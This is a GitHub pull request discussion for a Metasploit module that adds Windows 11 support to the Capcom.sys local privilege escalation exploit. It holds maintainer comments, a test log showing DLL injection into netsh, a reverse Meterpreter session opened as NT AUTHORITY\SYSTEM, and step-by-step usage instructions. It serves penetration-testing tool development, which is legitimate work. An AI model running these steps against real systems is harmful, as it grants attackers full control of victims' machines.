fix #15890: Support Windows 11 in Capcom.sys LPE Module #17474
Conversation
|
@prabhatjoshi321 Does this rely on #17336 being landed before this PR can be landed? If so I'm going to add the |
|
Looks like the version detection PR Is landed; I think this PR should be unblocked |
|
Removing delayed flag. This will likely need a rebase to resolve the conflicting file, but should now be ready to review. Thanks for updating this @adfoster-r7! |
|
@prabhatjoshi321 Any word on rebasing this to pull in latest changes and resolve the merge conflict? Also seems like a few outstanding comments here may still need to be addressed before we do another round of review. Edit: Rebased to pull in recent changes, will still need to review comments from reviews and see if we can address them. |
gwillcox-r7
force-pushed
the
fix-issue_#15890
branch
from
24c8a54 to
3ab7b3d
Compare
|
Upon further investigation it should be noted that 10.0.22000.194 is the only public version of Windows 11 that this adds support for. All previous versions were beta versions and as thus are unlikely to have been deployed outside of lab environments. Unfortunately to complicate matters, Visual Studio Subscriptions only lets me download Windows 11 (consumer editions), version 21H2 (updated Nov 2021), not the original Windows 11 21H2 release ISO. @prabhatjoshi321 Would you happen to still have a lab environment to test this in with the right Windows 11 version? I can try set one up myself but might take a bit of time. |
There was a problem hiding this comment.
Thanks for the enhancement @prabhatjoshi321! Changes look good and testing was as expected:
msf6 exploit(windows/local/capcom_sys_exec) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Launching netsh to host the DLL...
[+] Process 6776 launched.
[*] Reflectively injecting the DLL into 6776...
[*] Sending stage (200774 bytes) to 192.168.123.220
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 5 opened (192.168.123.1:4444 -> 192.168.123.220:49677) at 2023-09-08 12:58:01 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : MSFDEVICE
OS : Windows 10 (10.0 Build 22000).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
Release NotesThis PR adds support to the Capcom.sys driver LPE for Windows 11 21H1 |
Closes #15890
This pull request is a fix for the issue #15890 meant for the module
modules/exploits/windows/local/capcom_sys_exec.rb. Earlier the version check for the module relied onsysinfoand checked the version number to verify compatibility. Now the version check is updated to use @smashery implementation over at #17336 and the module is tested with the vulnerability inWindows 11 (build 22000.194)to verify its functionality for that particular platform. After the verification the description comments are updated accordingly.Verification
Following were the steps followed to check the expected results
msfconsoleuse multi/handlerset payload <the payload used>set LHOST <the interface ip>set LPORT <the port used in the payload>runsessionsNote down the session number to use later.use windows/local/capcom_sys_execset session <the session number obtained before>set LHOST <the interface ip>set LPORT <the desired port>runThe exploit works as expected. The reverse meterpreter shell is obtained with system privileges.
Windows version tested on.
The output
